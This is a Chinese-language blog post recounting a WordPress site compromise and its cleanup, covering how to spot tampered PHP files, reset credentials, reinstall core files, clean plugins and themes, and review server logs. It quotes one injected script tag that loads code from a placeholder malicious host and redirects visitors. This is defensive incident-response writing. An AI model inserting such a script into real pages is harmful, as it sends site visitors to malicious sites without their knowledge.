WordPress是全球使用量最多的免费博客, 网络上许多相传Wordpress遭到黑客攻击的事件都于Wordpress的版本有不少的关系.

因为发现不同的bug, WordPress发布了许多针对安全的版本更新, 旧版Wordpress遭到黑客攻击的可能性非常大, 所以许多使用Wordpress的博主都会选择更新到官方发布的最新版本.

但是最新版本一定安全吗? 答案是No!

EI使用的Wordpress网站不久前就被黑客光顾过一次.

EI的Wordpress已经是最新版, 在主机的php5.ini和.htaccess文件上也做了简单的防护, 单纯从网站的header上无法知道主机的php版本信息和导航主机上的文件, WordPress主要的设置文件都在.htaccess文件上做了安全工作, WordPress新版中可能泄露的版本信息也已经全部屏蔽, 登录用的是大小写字母, 数字和符号的混合性登录密码. 主机上传文件也只是用普通的FTP, WordPress的部分文件路径也是自定义过的.

虽然基本的安全措施都做到了, 可以让黑客多花点时间和功夫, 但是主机上的所有PHP文件还是让黑客加上了连接到恶意网站的代码, 数据库完好无缺. 黑客的手法很卑劣, 所有PHP文件头部都加上了反编译加密过的PHP代码, 代码主要在网站的尾部加上

<script src="http://恶意网址.com/oo.php"></script>

在网站完全加载之后将会跳转到一个恶意网站上, 只要Wordpress启用的主题或者插件的任何PHP文件上包含这些代码都会在页面尾部添加这一小段, 只看源文件很隐蔽, 网址也不是特别显眼.

要找出Wordpress是否已经被黑过, 用FTP登录时可以看到所有文件的最后修改日期和时间, 一般Wordpress除了升级之后核心等文件都不会有变化, 也就是日期和时间都会显示在升级的那个时间上. 如果你的Wordpress更新时间和你看到的日期和时间都不一样, 那就要看一下文件是否已经被修改了.

Linux主机首先要查看主机根目录下的.htaccess文件是否有被修改.

一般黑客都会将代码加密后加入到文件之中, 所以我们可以看看是否有加密过的PHP代码来判断.

如果很不幸, PHP文件的修改日期都显示为某一可疑的日期和时间, 检查一些文件发现所有主机上的PHP文件和EI的情况一样, PHP文件的头部都已经被黑客批量修改了, 表示Wordpress已经遭到黑客的入侵了.

发现已经被黑, 第一件事情就是修改密码了, 既然可以在PHP文件上动手脚, Mysql的密码也是唾手可得, 将主机登录的密码, Mysql密码, WordPress密码均需要修改, 检查Wordpress的帐号是否有隐藏帐号, 自己登录帐号的资料是否包含其他脚本.

密码搞定之后就是修复工作就开始了, 登录Wordpress (如果黑客没有破坏Wordpress, 只是在Wordpress挂马的话), 点击升级, 因为是最新版本, 所以我们可以选择重新安装最新版本Wordpress. 升级之后, 剩下的被修改过的文件不多了, wp-config.php等文件不受升级影响, 所以我们要手动删除插入的代码, 加密过的PHP代码很容易区分, WordPress的原PHP文件是没有经过任何加密.

用重新安装的方法恢复Wordpress程序文件之后, 插件和主题也是需要我们手动清理的, 我们可以将插件删除了在安装即可, 主题就重新上传吧, 相信用Wordpress的都有自己修改主题, 所以都应该有主题的备份.

最后就是重新导入之前备份过的数据库了, 当然, 如果确认过数据库并没有遭到入侵, 可以忽略.

全部搞定之后就刷新自己的网站, 看看源代码中是否还包含恶意代码, 如果已经干净了, 恢复工作也就完成了.

因为不确定是否为Wordpress最新版未发现的bug所导致被入侵, 查看主机的日志, 看文件遭到批量修改的时间主机上有哪些IP在请求什么文件, 必要时可以用htaccess封掉一些非法请求的IP.

EI建议同时可以安装插件来协助防御, 避免下次重蹈覆辙, 可浏览

WPIDS – PHPIDS 为Wordpress提供入侵防御

此外, 还需要经常备份数据库和主机上的文件以备不时之需.